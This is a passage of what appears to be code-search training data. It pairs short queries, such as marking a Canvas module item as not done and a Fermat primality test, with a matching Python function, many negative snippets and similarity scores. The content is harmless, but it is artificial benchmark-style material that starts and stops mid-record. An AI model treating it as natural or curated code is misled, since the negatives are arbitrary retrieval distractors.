_kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def update( ):\r\n pass", "def update(self)->None:\n pass", "def update(self):\n #self._switch.odlclient._request_json(self._path, method=\"put\", json={\n # \"flow\": self._odl_inventory()\n #})\n self.remove() # actually, remove only uses self.switch and self.id, so this removes the other entry as well.\n self.deploy()", "def update(self):\n # convert the text list of item identifiers into a list of parsed identifiers\n item_identifiers = filter(None, self.packing_list.list_items.replace('\\r', '').split('\\n'))\n # loop through list of parsed identifiers\n for item_identifier in item_identifiers:\n # 1. get the 'item' instance for this identifier and update it (e.g. SubjectRequisition, Aliquot)\n # 2. create a 'packing_list_item' instance related to this packing_list\n for item_model in self.packing_list.item_models:\n try:\n try:\n item = item_model.objects.get(specimen_identifier=item_identifier)\n optional_attrs = {'panel': item.panel, 'item_priority': item.priority}\n except FieldError:\n item = item_model.objects.get(aliquot_identifier=item_identifier)\n optional_attrs = {}\n user = self.user or item.user_modified\n self._update_item(item, user)\n self._create_or_update_packinglistitem(\n item_identifier,\n item,\n user,\n optional_attrs=optional_attrs)\n except item_model.DoesNotExist:\n pass", "def update(self, *args, **kwargs):", "def updateModel(self):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, data):\n pass", "def update(self, **options):\n pass", "def update():", "def update():", "def update(self):\n if not self._updating:\n self._update()\n else:\n _logme.log('Already updating, aborting.', 'debug')", "def updateItem(self, item, values):\n print ('Updating item: ' + unicode(item))\n item = int(item) #Importante: Para evitar que se caiga la api de PODIO más adelante\n message = self._client.Item.update(item, {'fields':values})\n return message", "def update(self):\n # TO DO for updating urls if changed\n pass", "def update(self, mapItem: MapItem):\n pass", "def update(self):\n self._client.patch(self)", "def update(self):\n self.__execute(self.pkgin_bin, \"update\")", "async def updated(self, value):\n pass", "def update(self, dt):\n super(Agent, self).update(dt)\n\n if self._module is not None:\n self._module.update(dt)", "def update(self):\n # default implementation is to do nothing.", "def update(self, *args, **kwargs) -> None:\n self.update_state(args[0])\n super().update(*args, **kwargs)", "def update_data(self):\n self._model.update()\n self.__refresh()", "def update_model(self):\n pass", "def Update(self):\r\n\r\n # does nothing\r\n pass", "def update(self) -> None:\n pass", "def Update(self, controller):\n pass", "def update(self, *args: Any, **kwargs: Any) -> None:\n self._check_for_increment(\"update\")\n self[-1].update(*args, **kwargs)", "def update_model(self):\n pass # TODO: Implement this.", "def update(self, args):\n pass", "def item_shared(self, item):\n self.update_item(item)", "def update_data():\n pass", "def item_read(self, item):\n self.update_item(item)", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, 
*args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, *args, **kwargs): # real signature unknown\n pass", "def update(self, request: HttpRequest) -> None:\n from .modifiers import basket_modifiers_pool\n\n self.extra_rows = OrderedDict()\n self.unit_price = Decimal(self.product.get_price(request))\n self.subtotal = self.unit_price * self.quantity\n self.total = self.subtotal\n for modifier in basket_modifiers_pool.get_modifiers():\n modifier.process_item(self, request)", "def update(self, *args, **kwargs):\n # callable, but does nothing by default", "def __itemChanged(self, event):\n if event in (items.ItemChangedType.DATA, items.ItemChangedType.MASK):\n self._updateFromItem()", "def update(self):\n self.m.update()", "def commandUpdate(self):\n pass", "def update(self, item):\n if isinstance(item, Component) and item.has_focus():\n idblock, sib = item.get_data()\n atuple = int(sib['info1'].decode()), sib\n self.parent.update_window(\n \"application.editionblock.seteditors\", atuple)\n else:\n self.parent.update_window(\n \"application.editionblock.cleareditors\", None)", "def update(self, parent):\r\n pass", "def update(self, request: HttpRequest) -> None:\n from .modifiers import basket_modifiers_pool\n\n items = self.get_items()\n self.extra_rows = OrderedDict()\n self.subtotal = 0\n for item in items:\n item.update(request)\n self.subtotal += item.total\n self.total = self.subtotal\n for modifier in basket_modifiers_pool.get_modifiers():\n modifier.process_basket(self, request)\n self._cached_items = items", "def submodule_update(self, *args: Any, **kwargs: Any) -> Iterator[Submodule]:\n return RootModule(self).update(*args, **kwargs)", "def Update(self, action, context):\n # type: (QtWidgets.QAction, MenuContext) -> None\n pass", "def update(self):\n for component in self.components.values():\n try:\n component.update()\n except Exception as e:\n if self.ds.isFMSAttached():\n log.error(\"In subsystem %s: %s\" % (component, e))\n else:\n raise e", "def update(self, params):", "async def update(self) -> None:\n data = await self._state.http.get_user_inventory(self.owner.id64, self.game.app_id, self.game.context_id)\n self._update(data)" ]
[ "0.7510124", "0.6885239", "0.6734443", "0.6734443", "0.6734443", "0.6712268", "0.6665374", "0.6665374", "0.6655217", "0.6655217", "0.66270894", "0.66064", "0.660304", "0.65442324", "0.6532563", "0.65279996", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.64953554", "0.6476467", "0.6458027", "0.6429411", "0.6429411", "0.6429411", "0.64222753", "0.6417129", "0.64086044", "0.6407966", "0.6355097", "0.633963", "0.6329778", "0.63035583", "0.6300588", "0.62765", "0.6256494", "0.624201", "0.6226217", "0.6180971", "0.617355", "0.61629325", "0.61480266", "0.6141742", "0.6141742", "0.6141742", "0.6141742", "0.6135648", "0.61195815", "0.61195815", "0.6109271", "0.6086106", "0.607024", "0.6065335", "0.60629684", "0.60600376", "0.60592985", "0.604853", "0.6045855", "0.6034528", "0.5998652", "0.5975558", "0.59690094", "0.5935201", "0.5932474", "0.59290147", "0.5911936", "0.5909394", "0.5880365", "0.5878961", "0.5862438", "0.58617145", "0.58617145", "0.58617145", "0.58617145", "0.58617145", "0.58617145", "0.58474815", "0.5842349", "0.58421427", "0.5837195", "0.5826314", "0.582329", "0.5814268", "0.5799839", "0.57930315", "0.5786483", "0.57730025", "0.57572174", "0.5756274" ]
0.67989796
2
Mark this module item as not done.
def uncomplete(self, **kwargs):
    response = self._requester.request(
        "DELETE",
        "courses/{}/modules/{}/items/{}/done".format(
            self.course_id, self.module_id, self.id
        ),
        _kwargs=combine_kwargs(**kwargs),
    )
    module_item_json = response.json()
    module_item_json.update({"course_id": self.course_id})

    return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mark_as_not_done(self):\n grade_event = {'value': 0, 'max_value': self.points}\n self.runtime.publish(self, 'grade', grade_event)", "def test_done_default_value_is_False(self):\n item = Item(name = \"A test item\")\n self.assertEqual(item.name, \"A test item\")\n self.assertFalse(item.done)", "def disable(self, item_id):\n pass", "def set_task_not_started(self):\n\n tasks = self._get_all_tasks()\n\n task_id = tasks[self.tasks_view.currentRow()].Id\n\n self.tasks_flow.set_status(task_id, 2)\n\n # Refresh the table\n self.write_tasks_table()", "def mark_as_done(self):\n\n done = self.in_progress_scroll_cell.get()\n if done is None:\n self.master.show_error_popup('No Item', 'There is no item in the list to mark as done')\n return\n self.in_progress_scroll_cell.remove_selected_item()\n self.done_scroll_cell.add_item(done)", "def markUnplayed(self, item):\n key = f'{self.METADATA}/actions/unscrobble'\n ratingKey = item.guid.rsplit('/', 1)[-1]\n params = {'key': ratingKey, 'identifier': 'com.plexapp.plugins.library'}\n self.query(key, params=params)\n return self", "def uncomplete(self):\n ### TODO: needs test code for code coverage!\n ## (it has been tested through the calendar-cli test code)\n if not hasattr(self.vobject_instance.vtodo, \"status\"):\n self.vobject_instance.vtodo.add(\"status\")\n self.vobject_instance.vtodo.status.value = \"NEEDS-ACTION\"\n if hasattr(self.vobject_instance.vtodo, \"completed\"):\n self.vobject_instance.vtodo.remove(self.vobject_instance.vtodo.completed)\n self.save()", "def async_mark_unavailable(self):\n self._available = False", "def deny(self):\n self.quest_node['completed_by'] = ''\n self.completed_by = None\n self.active = True\n self.quest_node['active'] = True\n graph.push(self.quest_node)", "def _clicked_no_button(self):\n self.yes = False", "def mark_no_changes(self):", "def _not(self, _not):\n\n self.__not = _not", "def _not(self, _not):\n\n self.__not = _not", "def _not(self, _not):\n\n self.__not = _not", "def _not(self, _not):\n\n self.__not = _not", "def _not(self, _not):\n\n self.__not = _not", "def set_as_not_feedback(self):\n self.feedback = False", "def mark_as_in_progress(self):\n\n in_prog = self.todo_scroll_cell.get()\n if in_prog is None:\n self.master.show_error_popup('No Item', 'There is no item in the list to mark as in progress')\n return\n self.todo_scroll_cell.remove_selected_item()\n self.in_progress_scroll_cell.add_item(in_prog)", "def pending(self):\n self.state = Step.State.PENDING", "def tick_skipped(self):\n pass", "def mark_as_undone(self):\n if self.can_mark_as_undone():\n return self.__set_completion_status(False)\n return False", "def begin_not_undoable_action(self):\n self.not_undoable_action = True", "def can_mark_as_undone(self):\n if (not self.archived) and self.event_store.done:\n return True\n return False", "def end_not_undoable_action(self):\n self.not_undoable_action = False", "def set_Off(self):\n if not(self._locked):\n self.__dict__['statusOn']=False\n self._undo_action()\n else:\n self._log.info('The JobProperty %s is blocked', self.__name__)", "def disable_if_done(self):\n for cost in self:\n cost.disable_if_done()", "def notEnabledDummy(self, ev):\n pass", "def just_died(self):\r\n self.dead = True", "def unmark_for_destruction(self):\n self.marked_for_destruction = False", "def uncheck(self,item):\r\n raise AbstractError\r\n return False", "def set_unavailable(self):\n self[\"available\"] = False", "def set_task_finished(self):\n self.busy = False", "def set_ignore_flag(self, reag_item_id: int, 
do_ignore: bool) -> dict:\n raise NotImplementedError('not implemented')", "def mark_complete(todo_list):\r\n item = select_item(todo_list, \"Please enter the item number you wish to \"\r\n \"Mark Completed and hide from the \"\r\n \"list\\nEnter a negative number or zero to \"\r\n \"cancel\")\r\n if item >= 0:\r\n todo_list[item].visible = False\r\n return", "def test_done_value_can_be_set_to_True(self):\n item = Item(name = \"A test item\", done = True)\n self.assertEqual(item.name, \"A test item\")\n self.assertTrue(item.done)", "def mark_as_done(self):\n self.status = \"DONE\"", "def should_skip(self, test_item):\n msg = messages.ShouldSkip(test_id=test_item.identifier)\n reply_msg = self._request(msg)\n return reply_msg.should_skip is not None", "def mark_as_done(self, task):\n raise NotImplementedError('')", "def setNoCheckout(self) -> None:\n ...", "def disable_if_done(self, commit=True):\n if self._is_billing_complete() and not self.disabled:\n self.disabled = True\n\n if commit:\n self.save()", "def not_use_triggered(self):\n\n self.select_items()\n if self.items_selected:\n for index, item in enumerate(self.items_selected):\n index_selected = self.indices_selected[index]\n frame_selected = index_selected + 1\n item.setText(\"Frame %i excluded\" % frame_selected)\n item.setBackground(self.background_excluded)\n item.setForeground(QtGui.QColor(255, 255, 255))\n self.index_included[index_selected] = False\n self.frame_selector.setPhoto(self.frame_index)", "def unlock(self, item_type):", "def check_deletable(self):\n item = self.albums_artists.currentItem()\n self.delete_button.setEnabled(False)\n if item in self.new_artists:\n self.delete_button.setEnabled(True)", "def mark_for_destruction(self):\n self.marked_for_destruction = True", "def set_goal_done(self):\n self.has_goal = False\n self.last_goal_wait = False", "async def _skip(self, ctx: commands.Context):\n\n if not ctx.voice_state.is_playing:\n return await ctx.send('Not playing any music right now...')\n\n voter = ctx.message.author\n if voter == ctx.voice_state.current.requester:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n\n elif voter.id not in ctx.voice_state.skip_votes:\n ctx.voice_state.skip_votes.add(voter.id)\n total_votes = len(ctx.voice_state.skip_votes)\n\n if total_votes >= 1:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n else:\n await ctx.send('Skip vote added, currently at **{}/3**'.format(total_votes))\n\n else:\n await ctx.send('You have already voted to skip this song.')", "async def team_unignore(self, ctx: commands.Context):\n await self.config.user(ctx.author).do_not_message.set(False)\n await ctx.send('Okay, I\\'ll include you back in team-wide DMs.')", "def must_skip(self, item):\r\n user = c.user if c.user_is_loggedin else None\r\n # Meetups are accessed through /meetups.\r\n if hasattr(item, 'subreddit') and not item.subreddit.can_view(user) and item.subreddit.name != 'meetups':\r\n return True", "def task_done(self, done, **kwargs):\n\n # If unknown task, kill execution\n if done not in self.doing:\n return\n\n # Set the task as completed\n self.done.append(self.doing.pop(self.doing.index(done)))\n\n # Call original method\n super(Queue, self).task_done(**kwargs)\n\n # Stop\n return", "def force_done(self):\n\n if self.can_done():\n return self.done()\n else:\n # we can not set that quest to done regularly, so we force it\n # nobody gets any experience and we might need a special notification for this\n self.quest.done = True\n self.quest.save()\n 
signals.quest_done.send(None, quest=self.quest)", "def is_emptiable(self) -> bool:\n raise NotImplementedError()", "def addSkip(self, test):\n test.status = \"skipped\"", "def uncheck(self, roommate_instance):\n if self.status == Item.PROCESSING_CODE and self.check_who == roommate_instance:\n self.status = Item.UNCHECKED_CODE\n self.check_who = None\n else:\n raise PermissionDenied", "def mark_missed(self):\n if self.state == TrackState.Tentative:\n self.state = TrackState.Deleted\n elif self.time_since_update > self._max_age:\n self.state = TrackState.Deleted", "def mark_missed(self):\n if self.state == TrackState.Tentative:\n self.state = TrackState.Deleted\n elif self.time_since_update > self._max_age:\n self.state = TrackState.Deleted", "def hide(self, item_id):\n pass", "def check_for_uncanceled(self, index):\n if 0 <= index < len(self.stops):\n stop = self.stops[index]\n if stop.status == StopStatuses.canceled:\n self.issue_time += timedelta(seconds=config.INTERVAL_BETWEEN_UPDATE_MSG)\n self.tasks.append(self.instruction_task(stop.station_url, 'prio', self.issue_time))", "def add_new_attributes(self):\n self.task = None\n self.reset_shadow()", "def entity_async_status_not(self, entity_async_status_not):\n\n self._entity_async_status_not = entity_async_status_not", "def entity_async_status_not(self, entity_async_status_not):\n\n self._entity_async_status_not = entity_async_status_not", "async def _skip(self, ctx: commands.Context):\n\n if not ctx.voice_state.is_playing:\n return await ctx.send('Cannot skip. Not playing any song right now.')\n\n voter = ctx.message.author\n if voter == ctx.voice_state.current.requester:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n\n elif voter.id not in ctx.voice_state.skip_votes:\n ctx.voice_state.skip_votes.add(voter.id)\n total_votes = len(ctx.voice_state.skip_votes)\n\n if total_votes >= 1:\n await ctx.message.add_reaction('⏭')\n ctx.voice_state.skip()\n else:\n await ctx.send('Skip vote added, currently at **{}/1**'.format(total_votes))\n\n else:\n await ctx.send('You have already voted to skip this song.')", "def _disable(self):\n self.enabled = False", "def pending(self):\n self.update({self.STATE: self.STATE_PENDING})", "def complete(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def untargeted(self):\n\t\tpass", "def set_not_ready(self):\n if self.game.has_started() or self.status == self.PLAYER_NOT_READY:\n return\n self.status = self.PLAYER_NOT_READY", "def _is_missing(self, item):\n pass", "def mark_as_in_progress(self, task):\n raise NotImplementedError('')", "def reset_continued(self): \n self._recent_goal_continued = False\n self._update_action = False\n self._update_action_without_pause = False", "def skip_post_assessment(self, _data, system):\r\n self.child_state = self.DONE\r\n return {'success': True}", "def noyable(self):\n return False", "def test_unavailable_item(self):\n item, change, _ = give_item_and_change('crisps', .50)\n self.assertIsNone(item)\n self.assertEqual(change, 0.5)", "def disable(self, index):\n self._action(index, StateVariable.enable, missingok=False, value=False)", "def markOff(isdelete = 0):\n\ttry:\n\t taskId = sys.argv[2]\n\t tasks = open(\"todo.txt\").readlines()\n\t file = 
open(\"todo.txt\", \"w\")\n\t doneTasks = open(\"done.txt\", \"a\")\n\t flag = True\n\t for task in range(len(tasks)):\n\t if task + 1 == int(taskId):\n\t \tflag = False\n\t \tif isdelete == 1:\n\t \t\tcontinue\n\t \telif isdelete == 0:\n\t \t\tdata = \"x {} {}\".format(datetime.today().strftime(\"%d/%m/%Y\"), tasks[task])\n\t \t\tdoneTasks.write(data)\n\t else:\n\t \tfile.write(tasks[task])\n\n\t if not isdelete:\n\t \tif flag:print(\"Error: todo #%s does not exist.\" % (taskId))\n\t \telse:print(\"Marked todo #%s as done.\" % (taskId))\n\t \n\t if isdelete:\n\t \tif flag:print(\"Error: todo #%s does not exist. Nothing deleted.\" %(taskId))\n\t \telse:print(\"Deleted todo #%s\" % (taskId))\n\n\texcept IndexError:\n\t\tif isdelete:print(\"Error: Missing NUMBER for deleting todo.\")\n\t\telse:print(\"Error: Missing NUMBER for marking todo as done.\")", "async def team_ignore(self, ctx: commands.Context):\n await self.config.user(ctx.author).do_not_message.set(True)\n await ctx.send('Okay, I won\\'t DM about this anymore.')", "def flag(self, reason):\r\n self._flagged = True\r\n self._flagged_reason = reason", "def item_done(self, rsp=None):\n self.export.item_done(rsp)", "def with_manual_check_never(self):\n self.__manual_check = constants.NEVER\n return self", "def discard(self, item):\n try:\n counter = self._get(item) - 1\n except KeyError:\n return\n\n if counter <= 0:\n self._del(item)\n else:\n self._set(item, counter)", "def set_delayed_test_to_done(self, guid_):\n db = DatabaseManager()\n query = \"\"\"UPDATE delayedTestData\n SET done=TRUE\n WHERE guid=%(guid)s\n AND done=FALSE\"\"\"\n db.execute_query_and_close(query, {\"guid\": guid_})\n return True", "def is_not_used(self):\n pass", "def ignore(self):\n self._ignore_transids = True", "def skip(self):\n self.skip_votes.clear()\n if self.is_playing():\n self.player.stop()", "async def disable(self, **kwargs) -> None: # pylint: disable=unused-argument\r\n await self.set_ena(False)", "def pending(self, pending):\n\n self._pending = pending", "def _apply_item(self, item: Item) -> bool:\n if self.locked:\n self.__locked = item.item_type != self.__key\n return not self.locked", "def reset(self):\n debug('resetting')\n self.marked = False", "def is_done():\n return False", "def add(self, item):\n self._set(item, None)", "def ignore(self, event):\n return not self.active", "def track_off(self,numero):\n if numero in self.tiempos.actual().obtener_habilitados():\n self.tiempos.actual().deshabilitar_track(numero)", "def mark_skipped(self, test):\n if not test:\n LOGGER.warn('Empty or None test name passed to standard_json_util')\n return\n\n self.tests[test] = {'expected': 'SKIP', 'actual': 'SKIP'}", "async def skip(self, ctx):\n\n state = self.get_voice_state(ctx.message.server)\n if not state.is_playing():\n await self.bot.say('Not playing any music right now...')\n return\n\n voter = ctx.message.author\n if voter not in state.voice.channel.voice_members and voter.id != INIT0:\n await self.bot.say('you are not in the current playing voice channel')\n return\n\n if voter == state.current.requester or voter.id == INIT0:\n await self.bot.say('Requester requested skipping song...')\n state.skip()\n return\n\n if state.current.requester.id == INIT0:\n await self.bot.say('nah this song is good')\n return\n\n if voter.id not in state.skip_votes:\n state.skip_votes.add(voter.id)\n total_votes = len(state.skip_votes)\n if total_votes >= state.votes_needed():\n await self.bot.say('Skip vote passed, skipping song...')\n state.skip()\n else:\n await 
self.bot.say('Skip vote added, currently at {}/{}'.format(total_votes, state.votes_needed()))\n else:\n await self.bot.say('You have already voted to skip this song.')", "def do_uncancel(self):\r\n self.write({'cancelled': False})", "def mark_as_unreportable(self, request, queryset):\n rows = queryset.update(reportable=False)\n if rows == 1:\n bit = \"1 harvest\"\n else:\n bit = \"%s harvests\" % rows\n self.message_user(request, \"%s marked as unreportable\" % bit)", "def assert_done(self, task):\n if task not in self.tasks_done:\n # do the task if not done\n method = getattr(self, task)\n method()", "def disable(self) -> None:", "def disable(self):\n # Check for new results and cache a copy in Django model\n self.update(do_update_assignments=True)\n self.connection.dispose_hit(self.mturk_id)", "def ignore_clicks(self):\n self._ignore_count += 1", "def action_done(self):\n if not self.date_done:\n self.date_done = fields.Datetime.now()\n if self.state_rapel == '1':\n self.generate_rapel()\n self.state = 'done'" ]
[ "0.662007", "0.62232697", "0.61218685", "0.5933863", "0.5878998", "0.58310205", "0.5791388", "0.5753141", "0.5665221", "0.56445396", "0.5607032", "0.552165", "0.552165", "0.552165", "0.552165", "0.552165", "0.5493468", "0.545121", "0.5446436", "0.54381365", "0.54248023", "0.54232657", "0.5401875", "0.5399981", "0.53973514", "0.5388705", "0.5385724", "0.53589815", "0.535629", "0.5346213", "0.53327155", "0.53295517", "0.5321923", "0.5294049", "0.5286776", "0.52845895", "0.5277851", "0.5276558", "0.5266226", "0.5262396", "0.522088", "0.519456", "0.5193986", "0.5189013", "0.5187303", "0.5176862", "0.517306", "0.5169785", "0.5163423", "0.514318", "0.5139866", "0.5136175", "0.512936", "0.5113269", "0.5113269", "0.5110818", "0.5105813", "0.51007545", "0.50958896", "0.50958896", "0.50934863", "0.5084174", "0.50823104", "0.5078781", "0.5059743", "0.5050894", "0.5043938", "0.5035689", "0.50337094", "0.5030746", "0.5024602", "0.502302", "0.50125587", "0.5004702", "0.5004387", "0.4989065", "0.49857482", "0.4982024", "0.4979534", "0.49784833", "0.49691787", "0.49680457", "0.49656525", "0.49566635", "0.4951427", "0.49461994", "0.49381524", "0.49362034", "0.49345025", "0.49237382", "0.4920169", "0.49151227", "0.48954713", "0.48922783", "0.4887596", "0.4878594", "0.48712787", "0.4860488", "0.48573866", "0.48556536" ]
0.5910725
4
Fermat's theorem: if a^(n-1) = 1 (mod n) for a random a, then n is probably prime
def fermats(n):
    randomlist = []
    for i in range(10):
        randomlist.append(random.randrange(2, n-1))
        i += 1
    for i in randomlist:
        if successivesquaring(i, n-1, n) != 1:
            return("n is composite")
    return("n is probably prime")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fermat_prime(n: int, k: int) -> int:\n assert n > 3 and k >= 1\n for _ in range(k):\n a = random.randint(2, n - 2)\n if pow(a, n - 1, n) != 1: # (a**(n-1)%n) != 1:\n return False\n return True", "def prime_test(n,p):\n for i in range(2, p):\n thing = 1\n while thing == 1:\n if n % i == 0:\n n = n/i\n else:\n thing = 0\n if n == 1:\n return False\n return True", "def isPrime(n): \n if n == 2 or n == 3: return True\n if n < 2 or n%2 == 0: return False\n if n < 9: return True\n if n%3 == 0: return False\n r = int(n**0.5)\n f = 5\n #Loop seeks out next prime factor and returns it\n while f <= r:\n if n%f == 0: return (False, f)\n if n%(f+2) == 0: return (False, (f+2))\n f +=6\n return True", "def isPrime(n):\n if n == 1:\n return False\n elif n < 4:\n return True\n elif n % 2 == 0:\n return False\n elif n < 9:\n return True\n elif n % 3 == 0:\n return False\n else:\n r = int(floor(sqrt(n)))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f+2) == 0: return False\n f += 6\n return True", "def is_prime(n):\n if n == 2 or n == 3: return True\n if n < 2 or n % 2 == 0: return False\n if n < 9: return True\n if n % 3 == 0: return False\n r = int(sqrt(n))\n f = 5\n while f <= r:\n if n % f == 0: return False\n if n % (f + 2) == 0: return False\n f += 6\n return True", "def is_prime(n):\n return mr_prime(n)", "def es_primo(n):\n \n for i in range(2, n):\n if n % i == 0:\n return False\n return True", "def is_prime_by_fermat_test(n, a):\n output = zn_pow(a, n-1, n) # a^{n-1}, mod n\n if output == 1:\n vprint(\"prime\")\n return True\n vprint(\"composite\")\n return False", "def primfact(e):\n for n in range(2, e):\n for x in range(2, n):\n if n % x == 0:\n break\n else:\n print n,", "def isprime(n):\r\n\treturn is_prime(n)", "def fermat_strong_test(n, a):\n if n == 2:\n return True\n # n - 1 = d * 2 ^ s\n d, s = factor_twos(n - 1)\n\n # by Fermat theorem, if n is prime then\n # (a^d - 1)(a^d + 1)(a^2d + 1)(a^4d + 1)...(a^2^(s-1)d + 1) = 0 (mod n)\n a = powmod(a, d, n)\n if a == 1 or a == n - 1:\n return True\n for _ in range(s):\n a = a * a % n\n if a == n - 1:\n return True\n return False", "def isprime(n):\n if n % 2 == 0:return False\n return all(n % i for i in range(3, int(n**0.5) + 1, 2))", "def is_prime(n):\n if n == 1:\n return False\n else:\n i = 2\n while i < n:\n if n % i == 0:\n return False\n i += 1\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2 or n == 3:\n return True\n elif n % 2 == 0:\n return False\n else:\n x = 0\n for i in range(3, n, 2):\n if n % i == 0:\n x = 1\n return x == 0", "def is_prime(n):\n if n <= 1:\n return False\n elif n <= 2:\n return True\n elif n % 2 == 0:\n return False\n else:\n for i in range(3, int(n**.5) + 1, 2):\n if n % i == 0:\n return False\n return True", "def isprime(n):\n\treturn is_prime(n)", "def is_prime(n):\n if n < 1 or n % 1 > 0:\n return False\n if n == 1 or n == 2:\n return True\n for i in range(3, int(math.sqrt(n)) + 1):\n if n % i == 0:\n return False\n return True", "def isprime(n):\n if n == 2: return True\n if n == 3: return True\n if n % 2 == 0: return False\n if n % 3 == 0: return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def snt(n):\r\n f = True\r\n for j in range(2, n):\r\n if n % j == 0:\r\n f = False\r\n break\r\n return f", "def equivalence(self, n):\n return n % self.prime", "def is_prime(n):\n x = 2\n def divide_x(x):\n if x > round(pow(n, 0.5)):\n return True\n elif n % x == 0:\n return False\n else:\n return 
divide_x(x + 1)\n return divide_x(x)", "def isprimeF(n,b):\r\n\treturn (pow(b,n-1,n) == 1)", "def prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def factorone(n):\n\tif (is_prime(n)): return n\n\tfor fact in (2,3,5,7,11,13,17,19,23,29):\n\t\tif n%fact == 0: return fact\n\treturn factorPR(n) # Needs work - no guarantee that a prime factor will be returned", "def isPrime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n\n return True", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i ** 2 <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def isprime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n i += w\n w = 6 - w\n return True", "def isPrime(n):\r\n # Znamo da 1 nije prost broj\r\n if n == 1:\r\n return False\r\n\r\n i = 2\r\n # Petlja se vrti od 2 do int(sqrt(x)) \r\n while i*i <= n:\r\n # Provjera da li i dijeli x bez ostatka\r\n if n % i == 0:\r\n # To znači da n ima faktor između 2 i sqrt(n)\r\n # Stoga nije prost broj\r\n return False\r\n i += 1\r\n # Ako nismo pronašli nijedan faktor u gornjoj petlji\r\n # onda je n prost broj\r\n return True", "def isprime(n):\n if n == 1:\n return False\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def isprimeF(n,b):\n\treturn (pow(b,n-1,n) == 1)", "def factorone(n):\r\n\tif (is_prime(n)): return n\r\n\tfor fact in [2,3,5,7,11,13,17,19,23,29]:\r\n\t\tif n%fact == 0: return fact\r\n\treturn factorPR(n) # Needs work - no guarantee that a prime factor will be returned\r", "def is_prime(n):\n if n == 2:\n return True\n if n == 0 or n == 1 or n % 2 == 0:\n return False\n for i in range(3, int(math.sqrt(n))+1, 2):\n if n % i == 0:\n return False\n return True", "def prime_factor(n):\n while n > 1:\n k = 2 \n while n % k != 0:\n k = k+1\n n = n // k\n print(k)", "def isprime(n):\n if n == 2:\n return True\n if n == 3:\n return True\n if n % 2 == 0:\n return False\n if n % 3 == 0:\n return False\n\n i = 5\n w = 2\n\n while i * i <= n:\n if n % i == 0:\n return False\n\n i += w\n w = 6 - w\n\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n == 2:\n return True\n if (n%2) == 0:\n return False\n for i in range(3,integer_sqrt(n)+1,2):\n if (n%i) == 0:\n return False\n return True", "def isPrime(n):\r\n if n == 2:\r\n return True\r\n if n == 3:\r\n return True\r\n if n % 2 == 0:\r\n return False\r\n if n % 3 == 0:\r\n return False\r\n\r\n i = 5\r\n w = 2\r\n\r\n while i * i <= n:\r\n if n % i == 0:\r\n return False\r\n\r\n i += w\r\n w = 6 - w\r\n\r\n return True", "def is_prime(n):\n if n < 2:\n return False\n if n in [2,3]:\n return True\n if n % 2 == 0:\n return False\n\n for factor in range(3, int(math.sqrt(n))+1, 2):\n if n % factor == 0:\n return False\n return 
True", "def is_prime(n):\n if n==1:\n return True\n def prime_helper(divisor):\n if divisor == 1:\n return True\n elif n % divisor == 0:\n return False\n else:\n return prime_helper(divisor-1)\n return prime_helper(n//2)", "def if_prime(cls, n):\n\n if (n <= 1):\n return False\n if (n <= 3):\n return True\n\n if (n % 2 == 0 or n % 3 == 0):\n return False\n\n i = 5\n while(i * i <= n):\n if (n % i == 0 or n % (i + 2) == 0):\n return False\n i = i + 6\n\n return True", "def is_prime(n, k):\n if n <= 1 or n == 4:\n return False\n if n <= 3:\n return True\n if is_even(n):\n return False\n while k > 0:\n\n # Take random int in [2, n-2]\n a = random.randint(2, n-1)\n\n # Check if a and n are co-prime.\n if gcd(n, a) != 1:\n return False\n\n # Fermat's little theorem\n if modpow(a, n-1, n) != 1:\n return False\n\n k -= 1\n\n return True", "def isPrime(n: int):\n if n <= 1:\n return False\n\n for i in range(2, n-1):\n if n % i == 0:\n # print(\"{} is divisable by {}\".format(n, i))\n return False\n\n return True", "def prime(n):\n # Case 0: n is 0, 1 or negative\n if n < 2:\n return False\n\n # Case 1: n = 